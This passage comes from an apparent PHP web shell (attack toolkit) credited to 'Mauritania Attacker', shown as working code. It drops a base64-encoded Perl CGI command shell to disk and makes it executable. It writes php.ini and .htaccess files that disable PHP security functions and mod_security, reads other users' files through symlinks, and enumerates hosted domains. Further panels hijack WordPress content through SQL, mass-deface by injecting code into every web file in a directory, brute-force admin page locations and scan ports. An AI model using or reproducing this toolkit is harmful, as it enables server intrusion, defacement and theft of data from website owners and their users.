GluZyBwcm9jZXNzDQoJcHJpbnQgIlVwbG9hZGluZyAkVHJhbnNmZXJGaWxlIHRvICRDdXJyZW50RGlyLi4uPGJyPiI7DQoNCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkDQoJY2hvcCgkVGFyZ2V0TmFtZSkgaWYgKCRUYXJnZXROYW1lID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJJFRyYW5zZmVyRmlsZSA9fiBtIShbXi9eXFxdKikkITsNCgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsNCg0KCSRUYXJnZXRGaWxlU2l6ZSA9IGxlbmd0aCgkaW57J2ZpbGVkYXRhJ30pOw0KCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdA0KCWlmKC1lICRUYXJnZXROYW1lICYmICRPcHRpb25zIG5lICJvdmVyd3JpdGUiKQ0KCXsNCgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsNCgl9DQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQNCgl7DQoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQ0KCQl7DQoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsNCgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9Ow0KCQkJY2xvc2UoVVBMT0FERklMRSk7DQoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7DQoJCQlwcmludCAiRmlsZSBQYXRoOiAkVGFyZ2V0TmFtZTxicj4iOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJcHJpbnQgIkZhaWxlZDogJCE8YnI+IjsNCgkJfQ0KCX0NCglwcmludCAiIjsNCgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCg0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlbmFtZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluaw0KIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBEb3dubG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgZG93bmxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJDQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQomUmVhZFBhcnNlOw0KJkdldENvb2tpZXM7DQoNCiRTY3JpcHRMb2NhdGlvbiA9ICRFTlZ7J1NDUklQVF9OQU1FJ307DQokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307DQokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9Ow0KJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsNCiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsNCiRPcHRpb25zID0gJGlueydvJ307DQoNCiRBY3Rpb24gPSAkaW57J2EnfTsNCiRBY3Rpb24gPSAibG9naW4iIGlmKCRBY3Rpb24gZXEgIiIpOyAjIG5vIGFjdGlvbiBzcGVjaWZpZWQsIHVzZSBkZWZhdWx0DQoNCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQNCiRDdXJyZW50RGlyID0gJGlueydkJ307DQpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7DQoNCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsNCg0KaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4NCnsNCgkmUGVyZm9ybUxvZ2luOw0KDQp9DQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQNCnsNCgkmRXhlY3V0ZUNvbW1hbmQ7DQp9DQplbHNpZigkQWN0aW9uIGVxICJ1cGxvYWQiKSAjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQ0Kew0KCSZVcGxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAjIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlDQp7DQoJJkRvd25sb2FkRmlsZTsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQNCnsNCgkmUGVyZm9ybUxvZ291dDsNCn0='; $file = fopen("vw.root" ,"w+"); $write = fwrite ($file ,base64_decode($cgipl)); fclose($file); chmod("vw.root",0755); echo "
Bypass Perl Security

"; } if(isset($_GET['action']) && $_GET['action'] == 'posget'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass posix_getpwuid

'; echo '
to

'; if($_POST){ $min = $_POST['min']; $max = $_POST['max']; echo"
"; $p = 0; error_reporting(0); $list = scandir("/var/named"); for($p = $min; $min <= $max; $p++) { $user = posix_getpwuid($p); if(is_array($user)){ foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); if($owner['name'] == $user['name']) { $i += 1; $cheechee = checkAlexa($domain); echo "
"; } } } } } echo "
Total Domains Found: ".$i."

"; } echo "
DomainsUsersSymlink
".$domain." - ".$cheechee."".$user['name']."
Dir


"; } if(isset($_GET['action']) && $_GET['action'] == 'suphp'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass PHP Suhosin Function Blacklist

'; echo "


"; echo ""; } if(isset($_GET['action']) && $_GET['action'] == 'simpelb'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Simple Bypasser

'; echo '
Create Folder :

Get File :


Fopen File :




'; if($_POST['folder']) { $mk = $_POST['dir']; $func = "bWtkaXI="; $de = base64_decode($func); $rules1 = $de($mk); if ($mk) { echo "
[+] Done [ $mk ] Created !"; } } # File Get Contents if($_POST['fileget']) { $get = $_POST['get']; $n4m = $_POST['name']; $path = $_POST['select']; $func2 = "ZmlsZV9nZXRfY29udGVudHM="; $de2 = base64_decode($func2); $rules2 = $de2($get); $open = fopen("$path/$n4m", 'w'); fwrite($open,$rules2); fclose($open); if($get) { echo "done"; } } # # fopen File if($_POST['fopen']) { $save = $_POST['save']; $path2 = $_POST['path2']; $open2 = fopen("$path2/$save", 'w'); $source1 = $_POST['source']; $source2 = stripslashes($source1); fwrite($open2 ,$source2); fclose($open2); if($open2) { echo "Done"; } } } if(isset($_GET['action']) && $_GET['action'] == 'ritf'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass Read File

'; echo " "; function readfils($file) { $web = $_POST['website']; switch ($web) { case 'show_source': $show = @show_source($file); break; case 'highlight_file': $highlight = @highlight_file($file); break; case 'readfile': $readfile = @readfile($file); break; case 'include': $include = @include($file); break; case 'require': $require = @require($file); break; case 'file': $file = @file($file); foreach ($file as $key => $value) { print $value; } break; case 'fread': $fopen = @fopen($file,"r") or die("Unable to open file!"); $fread = @fread($fopen,90000); fclose($fopen); print_r($fread); break; case 'file_get_contents': $file_get_contents = @file_get_contents($file); print_r($file_get_contents); break; case 'fgets': $fgets = @fopen($file,"r") or die("Unable to open file!"); while(!feof($fgets)) { echo fgets($fgets); } fclose($fgets); break; default: echo "{$web} Not There"; } } echo "

"; } if(isset($_GET['action']) && $_GET['action'] == 'wrdprshtmlinj'){ echo '
Mass Deface Dirs - Mass Change Admin Joomla - Mass Change Admin vBulletin - Mass Change Admin WordPress - Wordpress & Joomla Mass Deface - Wordpress Index Hijack Priv8 - Joomla Index Changer - Wordpress Index Changer - Cpanel & Ftp Auto Defacer
'; echo '
Wordpress Index Hijack Priv8


Coded By Mauritania Attacker





'; $pghost = $_POST['pghost']; $dbnmn = $_POST['dbnmn']; $dbusrrrr = $_POST['dbusrrrr']; $pwddbbn = $_POST['pwddbbn']; $index = stripslashes($_POST['pown']); $prefix = $_POST['prefix']; //$prefix = "wp_"; if ($_POST['up2']) { @mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error()); @mysql_select_db($dbnmn) or die(mysql_error()); $tableName = $prefix . "posts"; $ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 "); if (!$ghost1) { $ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 "); } elseif (!$ghost2) { $ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 "); } mysql_close(); if ($ghost1 || $ghost2 || $ghost3) { echo "

Index Website Have been Hijacked Successfully

"; } else { echo "

Failed To Hijack the Website :(

"; } } } if(isset($_GET['action']) && $_GET['action'] == 'baidir'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass Chmod Directory Priv8
Coded By Mauritania Attacker


'; echo '

'; if($_POST) { $mauritania = $_POST['file']; $ch = @chmod($mauritania,'0311'); if($ch) { echo "[+] Directory =>{$mauritania} => [+] Permission Changed Successfully Bypassed ^_^ [+]"; } else { echo "[-] Directory =>{$mauritania} => [-] Permission can't be changed , maybe chmod function is disabled :( [-]"; } } } if(isset($_GET['action']) && $_GET['action'] == 'forb14'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass Forbidden 2014
Coded by Mauritania Attacker


'; $fp = fopen("php.ini","w+"); fwrite($fp,"safe_mode = OFF Safe_mode_gid = OFF disable_functions = NONE disable_classes = NONE open_basedir = OFF suhosin.executor.func.blacklist = NONE "); echo'






'; echo '
PHP VERSION: ';echo phpversion(); $fichier = $_POST['file']; $ghostfile = $_POST['ghostfile']; $symlink = $_POST['symlink']; if ($symlink) { $dir = "mauritania"; if(file_exists($dir)) { echo "
[+] mauritania Folder Already Exist _ are you Drunk XD !!!
"; } else { @mkdir($dir); { echo '
\!/ mauritania Folder Created ^_^ \!/ '; echo '
File Retrieved Successfully'; } } $priv9 = "#Priv9 htaccess By Mauritania Attacker OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI Options Indexes FollowSymLinks DirectoryIndex $ghostfile ForceType text/plain AddType text/plain .php AddType text/plain .html AddType text/html .shtml AddType txt .php AddHandler server-parsed .php AddHandler txt .php AddHandler txt .html AddHandler txt .shtml Options All SetEnv PHPRC ".dirname(__FILE__)."/mauritania/php.ini suPHP_ConfigPath ".dirname(__FILE__)."/mauritania/php.ini "; $f =@fopen ('mauritania/.htaccess','w'); @fwrite($f , $priv9); @symlink("$fichier","mauritania/$ghostfile"); echo '
'.$ghostfile.''; } } if(isset($_GET['action']) && $_GET['action'] == 'smod14'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass SafeMode 2014 Priv8
Coded by Mauritania Attacker


'; echo "
Cwd     
Shell    
ini.php 



"; echo "
"; } if(isset($_GET['action']) && $_GET['action'] == 'setphr'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass suPHP Security

'; echo '


'; error_reporting(0); if(isset($_POST['gnr'])) { mkdir('suPHP',0755); $rr = " SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckCookieFormat Off SecFilterCheckUnicodeEncoding Off SecFilterNormalizeCookies Off order deny,allow deny from all allow from all order deny,allow deny from all suPHP_ConfigPath ".getcwd()."/php.ini"; $g = fopen('suPHP/.htaccess','w'); fwrite($g,$rr); echo "

.htaccess Has Been Generated Successfully


"; echo "

Click here

"; } echo '


'; error_reporting(0); if(isset($_POST['gnrp'])) { mkdir('suPHP',0755); $rr = "safe_mode = OFF Safe_mode_gid = OFF disable_functions = NONE disable_classes = NONE open_basedir = OFF suhosin.executor.func.blacklist = NONE"; $g = fopen('suPHP/php.ini','w'); fwrite($g,$rr); echo "

php.ini Has Been Generated Successfully


"; echo "

Click here

"; } } if(isset($_GET['action']) && $_GET['action'] == 'suppet'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass Functions suPHP_ConfigPath Security

'; echo '


'; error_reporting(0); if(isset($_POST['gnr'])) { mkdir('suPHP2',0755); $rr = " SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckCookieFormat Off SecFilterCheckUnicodeEncoding Off SecFilterNormalizeCookies Off order deny,allow deny from all allow from all order deny,allow deny from all suPHP_ConfigPath ".getcwd()."/php.ini"; $g = fopen('suPHP2/.htaccess','w'); fwrite($g,$rr); echo "

.htaccess Has Been Generated Successfully


"; echo "

Click here

"; } echo '


'; error_reporting(0); if(isset($_POST['gnrp'])) { mkdir('suPHP2',0755); $rr = "safe_mode = Off disable_functions = NONE safe_mode_gid = OFF open_basedir = OFF"; $g = fopen('suPHP2/php.ini','w'); fwrite($g,$rr); echo "

php.ini Has Been Generated Successfully


"; echo "

Click here

"; } } if(isset($_GET['action']) && $_GET['action'] == 'mass'){ echo '
Mass Deface Dirs - Mass Change Admin Joomla - Mass Change Admin vBulletin - Mass Change Admin WordPress - Wordpress & Joomla Mass Deface - Wordpress Index Hijack Priv8 - Joomla Index Changer - Wordpress Index Changer - Cpanel & Ftp Auto Defacer
'; if(!isset($_GET['code'])){ ?>
Mass Deface Dirs

Mass deface script, php/html/htm/asp/aspx/js



Folder:
'; } else{ if (is_dir($_GET['dir'])) { $lolinject = $_GET['code']; foreach (glob($_GET['dir']."/*.php") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.html") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.htm") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.asp") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.js") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.aspx") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } } else { //end if inputted dir is real -- if not, show an ugly red error echo ''.$_GET['pathtomass'].' is not available!'; } // end if inputted dir is real, for real this time } } if(isset($_GET['action']) && $_GET['action'] == 'admnpgfndr'){ echo '
Shell Finder - Jce Scanner - JCE Multi-Uploader - Port Scanner - Admin Page Finder - Search Files
'; echo '
Admin Page Finder

'; set_time_limit(0); error_reporting(0); $list['front'] ="admin adm admincp admcp cp modcp moderatorcp adminare admins cpanel controlpanel"; $list['end'] = "admin1.php admin1.html admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html ccms/ ccms/login.php ccms/index.php maintenance/ webmaster/ adm/ configuration/ configure/ websvn/ admin/ admin/account.php admin/account.html admin/index.php admin/index.html admin/login.php admin/login.html admin/home.php admin/controlpanel.html admin/controlpanel.php admin.php admin.html admin/cp.php admin/cp.html cp.php cp.html administrator/ administrator/index.html administrator/index.php administrator/login.html administrator/login.php administrator/account.html administrator/account.php administrator.php administrator.html login.php login.html modelsearch/login.php moderator.php moderator.html moderator/login.php moderator/login.html moderator/admin.php moderator/admin.html moderator/ account.php account.html controlpanel/ controlpanel.php controlpanel.html admincontrol.php admincontrol.html adminpanel.php adminpanel.html admin1.asp admin2.asp yonetim.asp yonetici.asp admin/account.asp admin/index.asp admin/login.asp admin/home.asp admin/controlpanel.asp admin.asp admin/cp.asp cp.asp administrator/index.asp administrator/login.asp administrator/account.asp administrator.asp login.asp modelsearch/login.asp moderator.asp moderator/login.asp moderator/admin.asp account.asp controlpanel.asp admincontrol.asp adminpanel.asp fileadmin/ fileadmin.php fileadmin.asp fileadmin.html administration/ administration.php administration.html sysadmin.php sysadmin.html phpmyadmin/ myadmin/ sysadmin.asp sysadmin/ ur-admin.asp ur-admin.php ur-admin.html ur-admin/ Server.php Server.html Server.asp Server/ wp-admin/ administr8.php administr8.html administr8/ administr8.asp webadmin/ webadmin.php webadmin.asp webadmin.html administratie/ admins/ admins.php admins.asp admins.html administrivia/ Database_Administration/ WebAdmin/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cPanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ members/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/ admin_area/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/ banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ server/ database_administration/ power_user/ system_administration/ ss_vms_admin_sm/ adminarea/ bb-admin/ adminLogin/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/ admin/admin.php admin_area/admin.php admin_area/login.php siteadmin/login.php siteadmin/index.php siteadmin/login.html admin/admin.html admin_area/index.php bb-admin/index.php bb-admin/login.php bb-admin/admin.php admin_area/login.html admin_area/index.html admincp/index.asp admincp/login.asp admincp/index.html webadmin/index.html webadmin/admin.html webadmin/login.html admin/admin_login.html admin_login.html panel-administracion/login.html nsw/admin/login.php webadmin/login.php admin/admin_login.php admin_login.php admin_area/admin.html pages/admin/admin-login.php admin/admin-login.php admin-login.php bb-admin/index.html bb-admin/login.html bb-admin/admin.html admin/home.html pages/admin/admin-login.html admin/admin-login.html admin-login.html admin/adminLogin.html adminLogin.html home.html rcjakar/admin/login.php adminarea/index.html adminarea/admin.html webadmin/index.php webadmin/admin.php user.html modelsearch/login.html adminarea/login.html panel-administracion/index.html panel-administracion/admin.html modelsearch/index.html modelsearch/admin.html admincontrol/login.html adm/index.html adm.html user.php panel-administracion/login.php wp-login.php adminLogin.php admin/adminLogin.php home.php adminarea/index.php adminarea/admin.php adminarea/login.php panel-administracion/index.php panel-administracion/admin.php modelsearch/index.php modelsearch/admin.php admincontrol/login.php adm/admloginuser.php admloginuser.php admin2/login.php admin2/index.php adm/index.php adm.php affiliate.php adm_auth.php memberadmin.php administratorlogin.php admin/admin.asp admin_area/admin.asp admin_area/login.asp admin_area/index.asp bb-admin/index.asp bb-admin/login.asp bb-admin/admin.asp pages/admin/admin-login.asp admin/admin-login.asp admin-login.asp user.asp webadmin/index.asp webadmin/admin.asp webadmin/login.asp admin/admin_login.asp admin_login.asp panel-administracion/login.asp adminLogin.asp admin/adminLogin.asp home.asp adminarea/index.asp adminarea/admin.asp adminarea/login.asp panel-administracion/index.asp panel-administracion/admin.asp modelsearch/index.asp modelsearch/admin.asp admincontrol/login.asp adm/admloginuser.asp admloginuser.asp admin2/login.asp admin2/index.asp adm/index.asp adm.asp affiliate.asp adm_auth.asp memberadmin.asp administratorlogin.asp siteadmin/login.asp siteadmin/index.asp ADMIN/ paneldecontrol/ login/ cms/ admon/ ADMON/ administrador/ ADMIN/login.php panelc/ ADMIN/login.html"; function template() { echo ' Admin page Finder by k[N]i[g]Ht

URL :


404string :





Verificat: 0 / 0
Found ones:




Admin page Finder
PHP Version

'; } function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) { if($br == 1) $msg .= "
"; echo ""; if($stop == 1) exit; @flush();@ob_flush(); } function check($x, $front=0) { global $_POST,$site,$false; if($front == 0) $t = $site.$x; else $t = 'http://'.$x.'.'.$site.'/'; $headers = get_headers($t); if (!eregi('200', $headers[0])) return 0; $data = @file_get_contents($t); if($_POST['xploit_404string'] == "") if($data == $false) return 0; if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0; return 1; } // -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- template(); if(!isset($_POST['xploit_url'])) die; if($_POST['xploit_url'] == '') die; $site = $_POST['xploit_url']; if ($site[strlen($site)-1] != "/") $site .= "/"; if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html"); $list['end'] = str_replace("\r", "", $list['end']); $list['front'] = str_replace("\r", "", $list['front']); $pathes = explode("\n", $list['end']); $frontpathes = explode("\n", $list['front']); show(count($pathes)+count($frontpathes), 1, 0, 'total', 1); $verificate = 0; foreach($pathes as $path) { show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0); $verificate++; show($verificate, 0, 0, 'verified', 1); if(check($path) == 0) show('not found', 1, 0, 'logbox', 0); else{ show('found', 1, 0, 'logbox', 0); show(''.$site.$path.'', 1, 0, 'rightcol', 0); } } preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1]; if(substr($site, 0, 3) == "www") $site = substr($site, 4); foreach($frontpathes as $frontpath) { show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0); $verificate++; show($verificate, 0, 0, 'verified', 1); if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0); else{ show('found', 1, 0, 'logbox', 0); show(''.$frontpath.'.'.$site.'', 1, 0, 'rightcol', 0); } } } if(isset($_GET['action']) && $_GET['action'] == 'portscnnre'){ echo '
Shell Finder - Jce Scanner - JCE Multi-Uploader - Port Scanner - Admin Page Finder - Search Files
'; echo '
Port Scanner

'; echo 'Port Scanner'; echo ''; $addr = $_SERVER["REMOTE_ADDR"]; $port = "80"; if ($_GET["addr"]) { $addr = $_GET["addr"]; } if ($_GET["port"]) { $port = $_GET["port"]; } if ($_GET["port2"]) { $port2 = $_GET["port2"]; } echo '
Please enter a website or IP and port of the website or IP address you wish to scan.

Address/IP


Port


Result


'; if ($_GET["addr"]) { if ($_GET["port"] && !$_GET["port2"]) { $fp = @fsockopen($addr, $port, $errno, $errstr, 2); $success = "#FF0000"; $success_msg = "is closed."; if ($fp) { $success = "#99FF66"; $success_msg = "is open."; } @fclose($fp); echo '
The address "' .$addr. ':' .$port. '" ' .$success_msg. '
